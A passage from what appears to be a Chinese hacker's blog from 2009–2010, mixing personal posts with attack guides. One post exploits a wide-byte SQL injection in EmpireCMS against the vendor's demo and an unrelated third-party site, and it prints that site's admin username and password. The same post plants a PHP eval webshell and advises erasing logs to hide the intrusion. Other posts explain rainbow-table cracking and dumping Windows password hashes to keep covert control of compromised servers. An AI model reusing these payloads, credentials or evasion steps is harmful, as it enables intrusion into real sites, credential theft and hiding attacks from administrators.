hackest's blog

杯具2010

Wed, 10 Mar 2010 11:40:35 +0000

题目：杯具2010
作者：hackest [H.S.T.]
来源：hackest's blog

话说今年是虎年，人人得都恨不得虎虎生威，但朕就惨了，我这只丁卯免被这头凶猛的庚寅虎弄得完全进入了倒霉状态……事件列表：
1、回家过年后发现被晒得很黑，家里白天温度30多度，北京居然前几天还下雪……（恐怖的温差）
2、回来的时候吧，买的还是站票，再一次站了二十几个小时的火车……（可悲的旅途，虽然列车广告一直“祝您旅途愉快”）
3、开个淘宝充值店吧，扔了几千块钱，赚了几块，还真是万本一利……（申请个闪电发货还给朋友给友情和谐了）
4、然后吧，今天想给自己充话费，就找了个朋友财付通转了几十块过去，让他代充下，结果又他妈B的现在都还没到账……（淘宝又不能自己购买自己的商品，借机加一个信誉值都这么KB！）
5、原来博客放的百度广告吧，想每月赚点伙食费吧，结果今天通知我号被和谐了，本来15号就发银两的了……（再晚几天封我咋的吧，百度爷，我承认我作弊了，人家Google都不封这么快的-_-）

以上所述局部有图为证……

Tags - 2010

关于彩虹表的那点事

Sun, 01 Nov 2009 08:16:21 +0000

题目：关于彩虹表的那点事
作者：hackest [H.S.T.]
来源：hackest's blog

一、概述

什么是彩虹表？
彩虹表（Rainbow Tables）就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合，不一定是针对MD5算法的，各种算法的都有，有了它可以快速的破解各类密码。越是复杂的密码，需要的彩虹表就越大，现在主流的彩虹表都是100G以上。嗯，最近似乎对彩虹表关注的人越来越多了，装备彩虹表的hacker在将来也会越来越多。不过很多人似乎对彩虹表并不是十分的了解。不过可以肯定的是，有不少人对彩虹表存在一定的误解，甚至有人以为有了彩虹表就能破解所有的不可逆向的算法的密码明文。事实上是不是这样呢？本文将从如何获得彩虹表，如何使用彩虹表破解密码等入手详细介绍一下彩虹表在密码破解领域的应用意义。

二、如何获得彩虹表

1、RainbowCrack生成

RainbowCrack是一个使用内存时间交换技术（Time-Memory Trade-Off Technique）加速口令破解过程的口令破解器，这个工具可以在地址http://project-rainbowcrack.com/下载。RainbowCrack使用了彩虹表，也就是一张预先计算好的明文和散列值的对照表。通过预先花费时间创建这样的彩虹表，能够在以后破解口令时节约大量的时间。详细的我就不说了，可以参考这里

2、Cain生成

在Cain的安装目录的Winrtgen文件夹下有一个名为Winrtgen.exe的程序，运行后如图1。

点击“Add Table”，如图2。

“Hash”下面可选项就是你能够生成的彩虹表种类了，记住彩虹表也是分类别的。曾经有人拿MD5的彩虹表去跑Windows的LM Hash，然后问我为什么连这么简单的组合都破解不了……MD5的彩虹表只能拿来破解MD5 Hash，牛头不搭马嘴的乱用，自然是功亏一篑，白白浪费时间不说，还闹笑话。“Min Len”最小位，也就是密码明文长度的最低位。“Max Len”最大位，也就是密码明文长度的最高位。比如你模糊的确定你手里的Hash的密码长度位数大概是5至7位，那么，最小位就是5，最高位就是7。Chain Len、Chain Count、N of tables是控制所生成表破解成功率的，软件下面会显示当前选项的破解成功率，当然是越接近100％越有用了，要不生成些破不了几个也没多大意义。表分割得越细，成功率就越高，生成的表体积也越大，所需时间也越长。“Charset”是字符集，也就是密码明文里所包含的字符，下拉可见有多个选项。设置好后点两下“OK”就会开始生成，这样生成结束后的表每张为610.35MB。

3、直接下载

除了上述两种生成工具之外，可能还会有些变种，在此不再一一描述。为什么要说下载的呢？可以自己生成为什么还要下载呢？嗯，其实原因就是下载比生成很得多，我做过测试，4核4GB内存的机器，生成2GB彩虹表，需要花费7天时间，而7天按1MB的带宽（160K/S左右）几乎可以下载30GB左右（我带宽比较有限，有时候还会无法连接，每天只能下4GB左右）。效果是明显要超过生成，当然了，你要是有超级计算机群生成的话，也不妨自己生成。对于广大网络安全爱好者来说，还是直接下载来得靠谱！

哪里有得下载呢？

这个还得看你需要破解什么密码，如果是要破解Windows Hash的话，建议用Ophcrack，速度相对较快，表的体积也相当较小。软件是可以免费下载的，表也有几百M可以免费用，甚至可以在线查询。在线查的这个用的是免费的几百M的表，效果一般，不过对于简单的密码来说，也足够了。有的可能不会用，在这里提一下。其实只要注意Hash的格式就可以了，比如Windows某个用户的密码为hackest，那查询的时候在"hash“旁边的框里填入“7831a0ffabee5fb3aad3b435b51404ee:d78df6e868e606e442313c5df93216f1”。再“sumbit hash”就可以得到返回结果。偶尔也会出现只显示了若干位的情况。也可以在这里查询密码Hash串。至于其他收费的表，我以前也有发过种子。http://www.hexsafe.com/download/Ophcrack%20XP%20Special%20Tables.torrent，这个是Ophcrack XP Special Tables。一般非Vista的密码Hash，用它能破绝大部分，但在使用过程中也有发现有小部分Hash正确，但无法破解的。所以说，不要相信什么这个表全那个表不全的，记住，表没有全的！表永远没有最大，只有更大。Vista的密码Hash可以在这里下表，http://www.hexsafe.com/download/Ophcrack%20Vista%20Special%20NTHASH%20Table.torrent这是Ophcrack Vista Special NTHASH的。官方是收费的表，不过国外共享了，也就可以免费得到了。如果这些表都跑不出来，而你又确定你的Hash没有搞错的话，那么只能找LC5出马了，LC5是一定能破的，只是时间有点久！

Free Rainbow Tables

官方网址：http://www.freerainbowtables.com/en/tables/
镜像下载：http://tbhost.eu/rt.php
提供了多种类型的彩虹表下载，LM、NTLM、MD5、SHA1等。千万别把人家法语字符的表也下了，对国人来说，几乎没什么用，不过如果你有特殊需要，那就下吧……这里提供的都是.rti格式的，有别于传统的.ri格式，.rti比.rt的多了一个目录.index文件，据说遍列速度比.rt的更快（未曾对比过，无法确定是否属实）。

还有据说是国内生成的120GB（其实是119.2GB）的彩虹表也能找到下载点，虽然不是怎么稳定……不过貌似此表不支持字符里有空格的。

三、如何使用彩虹表

关于Ophcrack的就不多说了，可以参考我博客里的另一篇文章《Windows系统密码破解全攻略》。重点说说怎么用在Free Rainbow Tables上下回来的彩虹表破解Hash。这里以MD5的彩虹表为例，说明一下如何使用彩虹表来破解MD5密码。假设明文为hackest的一串32位MD5值为3787795aeee01c9ab7267f252c932572。要用到的工具为rcracki_mt.exe，目前最新版本为0.6.1。点击这里下载文件把此工具及相关的dll文件复制到彩虹表所以目录，然后运行命令“F:\MD5>rcracki_mt.exe -h 3787795aeee01c9ab7267f252c932572 *.rti”就会开始破解，如图3。

当遍列到此Hash所在的表的时候，就会结束任务，显示结果。按我的机器配置来算，263GB的MD5表全部遍列一次，要2小时左右。期间会非常的卡，所以一般是睡觉的时候跑，要不真受不了。至于其他表，比如LM的，要把Hash分成两段，软件才能识别。比如密码明文为hackest的LM hash是7831a0ffabee5fb3aad3b435b51404ee，你就得把这段Hash对半分成两段，也就是16位一段，分行保存到hash.txt文件里，然后“F:\LM>rcracki_mt.exe -l hash.txt *.rti”就会开始破解。前16位存放密码明文的前7位，后16位存放密码明文的后7位，所以LM Hash最多只能存放14位长度的密码！而且LM Hash的破解结果只能是大写，因为LM Hash统一以大写存放明文，LM破解的是不分大小写的。NTLM的位数较多，所以密码长度超过14位的时候，抓取Hash的时候LM Hash会显示为一串0，或者显示为AAD3开头的一串字符，但NTLM却不受影响。要用NTLM的表破解NT Hash就应该这样：比如密码明文为hackest的NT Hash为d78df6e868e606e442313c5df93216f1，那命令格式就是F:\NTLM>rcracki_mt.exe -h d78df6e868e606e442313c5df93216f1 *.rti”。备注：-h参数是直接破解后面跟着的Hash值，一次只能破解一个，-l参数是导入一个存放了Hash的文件进行破解，一次可以破解多个，一行填一个Hash。

但是，这个MD5的表却不支持16位的MD5 Hash，不过我认为这个软件代码只要改改，应该是可以识别的，因为32位的Hash包含了16位的Hash值，只要把32位的去前8位，后8位，剩下的就是16位的Hash了。可以让软件只对比表里的16位Hash。
Tags - 彩虹表 , rainbow , tables , 破解密码

Win7 MSDN RTM 简体中文旗舰版下载

Mon, 26 Oct 2009 19:23:36 +0000

题目：Win7 MSDN RTM 简体中文旗舰版下载
作者：hackest [H.S.T.]
来源：hackest's blog

这次提供的是微软官方在MSDN上发布的Windows 7 RTM 正式版（旗舰版）的原版光盘镜像，不含任何杂质，刻盘收藏佳品！当然，由于是官方提供的镜像，肯定是不包含激活或破解信息的了，想要那种一安装完就自动激活的朋友就无视吧。激活方式可以网上找找，由于我是用在本本上，激活办法貌似非常多，就不一一列举了。如果是比较喜欢原版的就尽快下载吧，原版的系统永远是最稳定的！想了想还是提供一个激活的方法吧，详情请参考Thinkpad激活方法。我本本已经永久激活了，可更新系统补丁，Oh,My God！

32位 MSDN RTM正式版
点击这里下载文件

64位 MSDN RTM正式版
点击这里下载文件

文件信息：Windows 7 简体中文旗舰版 x86 (32位 MSDN RTM正式版)
文件名称：cn_windows_7_ultimate_x86_dvd_x15-65907.iso
SHA1校验值: B589336602E3B7E134E222ED47FC94938B04354F

文件信息：Windows 7 简体中文旗舰版 x64 (64位 MSDN RTM正式版)
文件名称：cn_windows_7_ultimate_x64_dvd_x15-66043.iso
SHA1校验值: 4A98A2F1ED794425674D04A37B70B9763522B0D4

Tags - win7 , 下载

投入百度怀抱

Wed, 14 Oct 2009 14:51:05 +0000

题目：投入百度怀抱
作者：hackest [H.S.T.]
来源：hackest's blog

hackest，您好：

　　恭喜您成功注册为百度联盟会员。您可以使用以下业务或服务：

　　搜索推广合作在页面上放置百度搜索框，将搜索流量转化为搜索收入。
　　网盟推广合作在页面上投放与内容相关的百度网盟推广合作业务，将流量转化为点击收入。
　　新业务合作加入百度联盟新业务合作业务，分享更多产品为您带来的收入。
　　

　　请访问http://union.baidu.com，使用您注册时的ID和密码登录到自己的帐户。

------------

　　百度联盟-帮助合作伙伴在各自领域取得成功

联盟产品代码投放中，请您积极遵守联盟业务合作规范，“蓝天365行动”邀您共建诚信联盟如果您在操作中有什么疑问，请及时与我们联系，我们会尽快解答。
更多常见业务问题说明

百度联盟发展部敬上
Tags - 百度

Google Adsense账号被K了

Tue, 13 Oct 2009 13:24:17 +0000

题目：Google Adsense账号被K了
作者：hackest [H.S.T.]
来源：hackest's blog

公元2009年10月10日，登录Adsense想看看今天的广告收入情况，结果提示如下：

帐户已禁用
此登录信息所对应的 AdSense 帐户目前已被停用。建议您查看电子邮件收件箱，看看是否收到了我们就您的帐户状态给您发送的邮件。我们的邮件有时可能会被电子邮件过滤器拦截。因此，请务必查看您电子邮件帐户的“群发/垃圾邮件”文件夹。

如果您的帐户因违反了我们的合作规范而被停用，请访问有关被停用帐户的常见问题解答以获取详情。

返回 AdSense 主页。

被K账号内有未支付美元2000多，折合RMB是15000，足够买个ThinkPad T400了。一下子什么都没有了，Fuck！
至此，Google Adsense体验“圆满”结束。

号外，据说，Google每当付款日期即将到来的时候就会大批K号，理由一般都是莫须有的罪名。可怜的站长们，谨以此志怀念下每天兴奋看着Google Adsense收入的日子，不过现在才明白，那不过是个阿拉伯数字而已……
Tags - google , adsense

媳妇的游戏家族MV

Mon, 10 Aug 2009 19:41:43 +0000

题目：媳妇的游戏家族MV
作者：hackest [H.S.T.]
来源：hackest's blog

呃，能看出来是哪个游戏不……
呃，其实爷并不在里面……
生活，快乐就好，That is all.

此处包含一个多媒体文件，请用网页方式查看。

这个是她自己制作的，里面当然就有我了
不过现在已经没有玩鸟……
仅供娱乐，谢绝人肉，禁止跨省追捕。

此处包含一个多媒体文件，请用网页方式查看。

Tags - mv

帝国CMS系统最新注入漏洞来入侵

Mon, 29 Jun 2009 21:16:40 +0000

题目：帝国CMS系统最新注入漏洞来入侵
作者：hackest [H.S.T.]
来源：hackest's blog

此文章已发表在《黑客X档案》2009年第7期杂志上
后经作者发布在博客上，如转载请务必保留此信息！

一、热身

在介绍这个漏洞之前，有必要先明白一个概念——宽字节注入。宽字节注入是相对于单字节注入而言的。单字节注入就是大家平时的直接在带有参数ID的URL后面追回SQL语句进行注入。比如：http://www.hackest.cn/article.php?id=1 and 1=1/*
http://www.hackest.cn/article.php?id=1 and 1=2/*
这个经典的判断目标是否存在注入的例子就是单字节注入。

大家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候，单引号（'）会被转义成\'。比如字符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠（\）的十六进制编码是%5C，单引号（'）的十六进制编码是%27，那么就可以得出%bf\'=%bf%5c%27。如果程序的默认字符集是GBK等宽字节字符集，则MySQL会认为%bf%5c是一个宽字符，也就是“縗”。也就是说%bf\'=%bf%5c%27=縗'。%bf并不是唯一的一个字符，应该是%81-%FE之间的任意一个都可以。不太好理解，我们用小葵写的一个字符转换的小工具来转换一下，如图1。

说到这里好像还没有看出来到底有什么用。了解PHP+MySQL注入的朋友应该都明白，单引号在注入里绝对是个好东西。尤其是，很多程序员都过分依赖于magic_quotes_gpc或者addslashes、iconv等函数的转义。理论上说，只要数据库连接代码设置了GBK编码，或者是默认编码就是GBK，那现在的程序里到处都是注入漏洞。事实上，这种变换在XSS等领域也发挥了巨大的作用，在PHP+Linux后台程序结合的时候，还可能造成命令注入，也就是说能可以在注入点直接执行Linux系统命令。比如登录文件login.php的代码如下：

$conn=mysql_connect("localhost","root","hackest");
mysql_query("SET NAMES 'GBK'");
mysql_select_db("test",$conn);
$user=mysql_escape_string($_GET['user']);
$pass=mysql_escape_string($_GET['pass']);
$sql="select * from cms_user where username='$user' and password='$pass'";
$result=mysql_query($sql,$conn);
while ($row=mysql_fetch_array($result, MYSQL_ASSOC)) {
$rows[]=$row;
}
?>

则可以通过构造以下语句进行注入：
http://www.hackest.cn/login.php?user=%df'%20or%201=1%20limit%201,1%23&pass=
%20是空格的URL编码，%23是#的URL编码，Mysql注释符之一。对应的SQL语句是：
select * from cms_user where username='運'or 1=1 limit 1,1#' and password="

---------------------------------------------------------------------------------------
以上内容摘自网络，经过分析整理后用以说明问题，来源不详，感谢前辈们。^-^
---------------------------------------------------------------------------------------

二、实践

理论准备得差不多了，该来点实际的了，这次就拿帝国CMS做例子吧。帝国CMS是号称最安全、最稳定的开源CMS（内容管理系统）。帝国CMS的留言本文件部分代码如下：

//权限
if($gbr['groupid'])
{
  include("../../class/user.php");
  $user=islogin();
  include("../../class/MemberLevel.php");
  if($level_r[$gbr[groupid]][level]>$level_r[$user[groupid]][level])
  {
    echo"";
    exit();
  }
}
esetcookie("gbookbid",$bid,0);
$bname=$gbr['bname'];
$search="&bid=$bid";
$page=(int)$_GET['page'];
$start=(int)$_GET['start'];
$line=12;//每页显示条数
$page_line=12;//每页显示链接数
$offset=$start+$page*$line;//总偏移量
$totalnum=(int)$_GET['totalnum'];
if($totalnum)
{
  $num=$totalnum;
}
else
{
  $totalquery="select count(*) as total from {$dbtbpre}enewsgbook where bid='$bid' and checked=0";
  $num=$empire->gettotal($totalquery);//取得总条数
}
$search.="&totalnum=$num";
$query="select lyid,name,email,`call`,lytime,lytext,retext from {$dbtbpre}enewsgbook where bid='$bid' and checked=0";//hackest注解：关键是这一句，与上面举例的何其相似啊！
$query=$query." order by lyid desc limit $offset,$line";
$sql=$empire->query($query);
$listpage=page1($num,$line,$page_line,$start,$page,$search);
$url="".$fun_r['index']." > ".$fun_r['saygbook'];
?>
注意注释部分！就直接拿官方测试吧，我就不本机折腾了。官方演示站点：http://demo.phome.net/，还别说，界面倒是蛮清爽的，难怪这么多站长用咯。直奔留言本页面：http://demo.phome.net/e/tool/gbook/?bid=1，注意要带上bid=1（我下载了套最新版的帝国CMS，e/tool/gbook目录下就一个index.php文件，直接访问它会有错误提示，并跳转至前一个页面）。然后下拉至“请您留言:”处，按如下要求填写相关信息：
姓名：123縗\
联系邮箱：,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
联系电话：随便写
留言内容：随便写

填好后如图2

提交后就能看到爆出来的用户名、密码MD5、还有rnd值了，如图3。

wm_chief就是开发帝国CMS的程序员。因为提交了好几遍，在后台又删不掉，所以有多条记录。破解出来密码明文就可以登录后台了，不过官方演示站点后台并没有数据库操作权限，凡是涉及到数据库的操作就会提示：

在线演示仅开放观看权限，与数据库相关操作已被管理员禁止!
如果您的浏览器没有自动跳转，请点击这里

而且这个MD5是在线查询查不出来的，明文是用MD5的彩虹表破解出来的，后面会附图。这个后台就是只能让你看看，顺便体验一下其强大的功能（官方也提供的演示管理员用户名和密码均为admin，也可以登录，不过都是操作不了的），拿这个密码去社工一下管理员，也没有什么意外的收获，其博客、论坛、邮箱、官方站点FTP、官方站点3389等均无法进入，所以官方是搞不到Webshell了。

三、替补

官方进不去就找个替罪羊吧，Google以关键字“inurl:e/tool/gbook/?bid=1”搜索，搜出来的站点99%都是用帝国CMS的。随便找了一个，测试证明，漏洞存在，如图4。

可恨的是这个MD5值也是无法在线查询出来的，又得开动彩虹表跑跑咯，把刚才官方的那个MD5也一起跑了吧，出去吃完饭回来，结果就出来了，如图5。

顺便啰嗦一下，如果有志于网络安全事业的发展，彩虹表还是必不可少的。什么是彩虹表呢？就是一个庞大的、针对各种可能的字母组合预先计算好的哈希值的集合，不一定是针对MD5算法的，各种算法的都有，有了它可以快速的破解各类密码。越是复杂的密码，需要的彩虹表就越大，现在主流的彩虹表都是100G以上。

该进后台了，后台地址默认为e/admin/。用户名：joycar，密码：zuxywz119，顺便进入后台，如图6。

进了后台应该怎么样才能拿到Webshell呢？添加上传后缀，我试了下，不可行。网上搜了一下相关资料，原来在模板管理那里有猫腻哦。进入后台->模板管理->自定义页面->增加自定义页面。页面名称随便填，文件名也得取一个，文件名处可以填指定路径，分类不必理会，页面内容处写入如下代码：

<\?php eval($_POST[cmd]);?\>

一般的PHP一句话马的代码是，其中cmd是密码。但是这里一定要按上面要求的前后都要加上\，不加的话就不会成功，非常重要，务必记住！然后点击提交，再返回到管理自定义页面，点击刚才起的页面名称，直接跳转至e/admin/template/hackest.php，无法找到该页，路径不对嘛，当然找不到了，改成e/admin/hackest.php，再访问，一片空白，心中窃喜，有戏了……如图7、图8。

再用lanker微型PHP+ASP管理器1.0双用版连接一句话，提交下环境变量看看，如图9。

再上传一个PHP大马就大功告成了，是Linux系统的，发行版是Red Hat Enterprise Linux AS release 4，有溢出保护，提不了权咯，如图10。

最后千万记得把刚才爆用户名和密码的那条留言删除，再把你添加的自定义页面也删除，后台日志也处理下。好多人都不知道什么叫清理日志，其实就是尽可能地把关于你的操作的相关记录删除。比如你登录了3389，系统日志会记录，比如你登录了FTP，应用程序日志也会记录，比如你对这个网站做了注入攻击，IIS或者其他WEB应用程序也会记录……技术过硬的管理员能从这些日志里分析出你的攻击方法，攻击来源等细节，安全工作一定要做足，万万马虎不得。

四、修补

官方虽然也被爆了一段时间了，但是似乎并没有引起足够的重视，截止至发稿日仍然没看到官方有任何关于修补此漏洞的解决方案（其实也不能完全算是帝国CMS的错，编码这个问题最近闹得比较凶-_-）。

解决方法：就是在初始化连接和字符集之后，使用SET character_set_client=binary来设定客户端的字符集是二进制的。修改Windows下的MySQL配置文件一般是my.ini，Linux下的MySQL配置文件一般是my.cnf，比如：mysql_query("SET character_set_client=binary");。character_set_client指定的是SQL语句的编码，如果设置为binary，MySQL就以二进制来执行，这样宽字节编码问题就没有用武之地了。
Tags - 帝国cms , 注入漏洞

Windows系统密码破解全攻略

Mon, 29 Jun 2009 20:49:17 +0000

题目：Windows系统密码破解全攻略
作者：hackest [H.S.T.]
来源：hackest's blog

此文章已发表在《黑客X档案》2009年第6期杂志上
后经作者发布在博客上，如转载请务必保留此信息！

引子

我一直在想，到底用什么样的方式才能较长时间地控制已经得到了权限的目标呢？留后门，种木马，甚至是Rootkit？留的Webshell痕迹太明显，哪怕是一句话的Webshell，都极容易被管理员清除。放了木马，也容易被有经验的管理员查出来，毕竟现在能做到无声无色的木马还是比较少。早期的是自己建个进程，结束掉进程就over了，后来有了注入进程的木马，再后来还有了以服务启动的木马，还有些是替换某些不要紧的系统自有服务来启动的……不过上述方法隐蔽性都太差了，不管你的后门留得如何完美，不管你的木马程序多么免杀，终究还是做不到不留任何痕迹。

是不是就没有办法了呢？非也，某前辈（凋凌玫瑰）的一句名言惊醒了N多彷徨的菜鸟（如我之流）：我一般不喜欢在服务器留木马或是后门，我比较喜欢利用管理员进入的方式来管理服务器（凋凌玫瑰文章原话引用）。管理员的进入方式，怎么理解呢？换句话说就是，管理员是怎么进他服务器的，我们就怎么进他的服务器。如果他是3389终端进入的，我们就终端进入，当然前提是要想办法得到他的管理员用户的密码；如果他是Pcanywhere进入的，我们就想办法获取他的Pcanywhere密码进入；如果他是Radmin进入服务器的，我们也要想办法搞到他的Ramin密码进入。这样的话，隐蔽性就大大提高了，肉鸡自然就没有这么容易跑掉了。如果他这个密码是域管理员密码，如果他这个密码可以管理整个机房的机器，如果他这个密码可以通杀他的内网，如果这个密码还能登录他的QQ！夸张点说，甚至他重装系统了，还用的是这个密码，那你的肉鸡又复活了……后果真是太可怕了（擦下汗先）！废话少说，直入正题——Windows系统密码破解全攻略。本文所指均为无物理接触的系统密码破解，如果让黑客物理接触计算机，根本就没有什么系统进不去的，而且操作更加简单，速度更快，呵呵。

背景

要破解一个程序的密码，要先了解它的一些背景知识。先来简单说一下Windows系统密码的加密算法。早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制，简称LM，它是如此简单以至很容易被破解。微软提出了WindowsNT挑战/响应验证机制，称之为NTLM。现在已经有了更新的NTLMv2以及Kerberos验证体系。Windows加密过的密码口令，我们称之为hash（中文：哈希），Windows的系统密码hash默认情况下一般由两部分组成：第一部分是LM-hash，第二部分是NTLM-hash。以下内容摘选自安全焦点：

--------------------------------------引文开始----------------------------------------------

一、如何从明文口令生成LM-Hash？

1、假设明文口令是"Welcome"，首先全部转换成大写WELCOME，再做如下变换：
"WELCOME" -> 57454C434F4D4500000000000000
先把WELCOME转换成十六进制形式，在明文口令不足14字节的情况下，后面添加0x00补足14字节。有些书上介绍添加空格(0x20)补足14字节，这是错误的，我不清楚是原作者写错了，还是译者的问题。

2、然后切割成两组7字节的数据，分别经str_to_key()函数（代码已附光盘）处理得到两组8字节数据：
57454C434F4D45 -str_to_key()-> 56A25288347A348A
00000000000000 -str_to_key()-> 0000000000000000

3、这两组8字节数据将做为DESKEY对魔术字符串"KGS!@#$%"进行标准DES加密（代码已附光盘）：

"KGS!@#$%" -> 4B47532140232425

56A25288347A348A -对4B47532140232425进行标准DES加密-> C23413A8A1E7665F
0000000000000000 -对4B47532140232425进行标准DES加密-> AAD3B435B51404EE

4、将加密后的这两组数据简单拼接，就得到了最后的LM-Hash

Welcome的LM-Hash: C23413A8A1E7665FAAD3B435B51404EE。

显然，由于明文口令一开始就全部转换成大写，导致多个明文口令对应一个LM-Hash。反过来，在穷举破解LM-Hash时，得到的有可能不是原始口令，因为不可能确定大小写。仔细观察前述SMB身份验证过程，即使这里得到的不是原始口令(大小写有差别)，同样可以通过SMB身份验证。这种转换成大写的行为减小了穷举破解难度。

另一个弱点，当明文口令小于8字节时，LM-Hash后8字节的计算过程总是这样的：

00000000000000 -str_to_key()-> 0000000000000000

对4B47532140232425进行标准DES加密-> AAD3B435B51404EE

这也将减小穷举破解难度。

IBM设计了这个LM-Hash算法，魔术字符串"KGS!@#$%"的意义无从考证。这个算法称之为"哈希"不怎么妥当，由于是标准DES加密，完全是可逆的。当然，由于要穷举的是DESKEY本身，与传统所说的可逆有区别。

二、如何从明文口令生成NTLM-Hash？

IBM设计的LM-Hash算法存在几个弱点，微软在保持向后兼容性的同时提出了自己的挑战响应机制，所以，NTLM-Hash应运而生。

1、假设明文口令是"123456"，首先转换成Unicode字符串，与LM-Hash算法不同，这次不需要添加0x00补足14字节：

"123456" -> 310032003300340035003600

从ASCII串转换成Unicode串时，使用little-endian序，微软在设计整个SMB协议时就没考虑过big-endian序，ntoh*()、hton*()函数不宜用在SMB报文解码中。0x80之前的标准ASCII码转换成Unicode码，就是简单地从0x??变成0x00??。此类标准ASCII串按little-endian序转换成Unicode串，就是简单地在原有每个字节之后添加0x00。

2、对所获取的Unicode串进行标准MD4单向哈希（代码已附光盘），无论数据源有多少字节，MD4固定产生128-bit的哈希值，16字节：

310032003300340035003600 -进行标准MD4单向哈希-> 32ED87BDB5FDC5E9CBA88547376818D4

3、就得到了最后的NTLM-Hash

123456的NTLM-Hash: 32ED87BDB5FDC5E9CBA88547376818D4。

NTLM-Hash与LM-Hash算法相比，明文口令大小写敏感，但无法根据NTLM-Hash判断原始明文口令是否小于8字节，摆脱了魔术字符串"KGS!@#$%"。

MD4是真正的单向哈希函数，穷举做为数据源出现的明文，难度较大。问题在于，微软一味强调NTLM-Hash的强度高，却避而不谈一个事实，为了保持向后兼容性，NTLM-Hash缺省总是与LM-Hash一起使用的。这意味着NTLM-Hash强调再高也是无助于安全的，相反潜在损害着安全性。增加NTLM-Hash后，首先利用LM-Hash的弱点穷举出原始明文口令的大小写不敏感版本，再利用NTLM-Hash修正出原始明文口令的大小写敏感版本。

--------------------------------------引文结束----------------------------------------------

实战

理论准备得差不多了，进入实战阶段。当你已经得到Windows的系统权限后，如何才能获得管理员的密码hash呢？不同版本的Windows的hash获取方法不一样。用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack。下面将会详细介绍如何抓取各Windows版本的系统密码hash。

1、Windows 2000

比较老的一个Windows版本，同时也有好几个子版本，现在还在不少服务器上跑着，虽然性能和安全性都有点跟不上时代的脚步了，但是我们也不能放过。本文主要针对服务器目标，所以测试系统为Windows 2000 高级服务器版，打了SP4补丁的，已更新所有补丁，如图1。

2000下可以用pwdump7.exe来抓取系统用户的hash，命令格式：pwdump7.exe >2000hash.txt，意思为抓取所有用户hash，并写入2000hash.txt这个文本文件，如图2。

也可以用SAMInside自带的小工具GetHashes.exe，命令格式：GetHashes.exe $local >2000.txt，意思是抓取所有用户hash并写入2000.txt这个文本文件，如图3。

还可以用图形界面的SAMInside，打开SAMInside，点击“File”，然后点击“Import local Users via Scheduler”，稍等一会就成功抓取到hash了，如图4、图5。

因为这个是利用Windows的计划任务来抓取的，所以Task Scheduler服务必须启动，否则抓不出来。抓到hash之后还要导出，以方便用其它更强大的破解工具进行破解工作。如果要导出所有用户的hash，就点击“File”，然后点击“Export Users to PWDUMP File...”，然后保存为txt文本即可。如果只需要其中一个用户的hash，就选“Export Selected Users to PWDUMP File...”，同样保存为txt文本即可，如图6。

操作都比较简单吧。SAMInside同时也是一个破解工具，可以对抓取的hash进行简单的破解工作，还自带了一个常用字典，还可以结合彩虹表进行破解，如果密码不是太复杂，在这里就可以得到密码明文了。

顺便提一下Windows 2000下的另一个得到管理员密码的方法，用aio.exe（aio是All In One的缩写，是一些小工具的集合）直接读取内存中的密码，Windows 2003 SP1、SP2补丁没有打的话，也可以这样读取出来密码明文。命令格式：aio.exe -findpassword，成功读出了密码，密码为2000，如图7。

此方法只有在管理员登录了，而又没有注销的情况下才可以成功读出密码。

2、Windows XP&Windows 2003

参照上面抓2000的，步骤都差不多。不过比较推荐用SAMInside抓取，因为pwdump7不太稳定，有时候抓到的hash不一定正确，甚至还有可能抓不出来……图开界面下用SAMInside抓取，命令行下用SAMInside自带的那个小工具GetHashes.exe抓取，hash一般保存为txt文件即可。下面再介绍一些上面没提到的工具如何抓取hash，这些工具自己能抓，也能破解，比较强大。聪明的读者可能会发现上面提到的工具只出场了一部分，还有好几个都还没有露面，嘿嘿……下面就来介绍下另外几个强大的工具。

LC5

如果要用LC5抓取本机的hash，就依次打开“Session”->“Import”->“Local machine”稍等片刻就可以成功抓取到hash了，如果你要导入破解hash，就选“Import from file”->“From PWDUMP file”导入即可进行破解，如图8、图9。

再点击小三角形按钮就可以开始破解了。当然你还可以对破解做一些调整，“Session”->“Session Options...”，在“Btute Force Crack”选项里的“Character Set:”里可以设置字符集，默认选的是alphabet+numbers，字母和数字，如图10、图11。

LC5是非常强大的，可以这么说，只要你的hash是正确的，就没有破不出来的密码，前提是你有足够的时间，我曾经试过跑一个密码用了17天（不必惊讶，以写本文之前，我已经找到了比LC5更强大的工具，破解时间大大缩短，后面将会提到^-^）！

Cain

Cain我相信很多喜欢嗅探的朋友都会知道，但是你知不知道它除了嗅探之外还具备了强大的密码破解功能呢？如何用Cain来抓取hash呢，同样十分简单（试想像一下，你一边开着Cain嗅同网段其它机器的时候，一边破解已控制目标的管理员密码是一件多么酷的事情）。安装Cain所需驱动WinPcap，才能启动Cain，不过如果你只是用它来破解密码，而不需要嗅探类操作的话，打开Cain的时候它提示缺少什么文件就在安装目录建一个同名dll文件即可打开（欺骗Cain，让它为我们服务，不过这样做当然不具备嗅探类功能）。点选“Cracker”->“LM&NTLM Hashes”，然后点下右边空白处，蓝色+号按钮即可激活，然后点击它，弹出“Add NT Hashes from”->“Import Hashes from local system”->勾选“Include Password History Hashes”，然后Next，hash就抓出来了，如图12、图13。

右键单击你要破解的用户，“Brute-Force Attack”->“NTLM Hashes”->“Start”，就会开始暴力破解了，如果你的密码足够简单，很快就有得出结果，当然你同样可以像LC5一样选择你觉得可能的字符集，以改善破解速度，还可以自定义字符集。Administrator的密码为2009，轻松破解，如图14、图15。

3、Windows Vista&Windows 7&Windows 2008

眼尖的朋友可以会发现还有两个工具没有露面，难道它们更加强大？没错，读完本文你就知道它们到底强大到了什么样的程度，或者前面所提到的东西不足以引起你的兴趣，那下面的东西将会让你对密码破解有一个更深刻的认识。为什么要把Vista及其后面的Windows系统版本分开说明呢，当然是有原因的。在Windows 2008中，微软对SAM和SYSKEY采取了与之前版本Windows不同的加密方法，尤其加密采用的NTLM-Hash算法远比之前的LM-Hash更复杂得多，这使得之前用于Windows NT/2000/XP上的破解管理员密码的方法统统失效了（其实只是Windows 2008默认状态下把LM-hash禁用了，所以就增加了破解难度）。

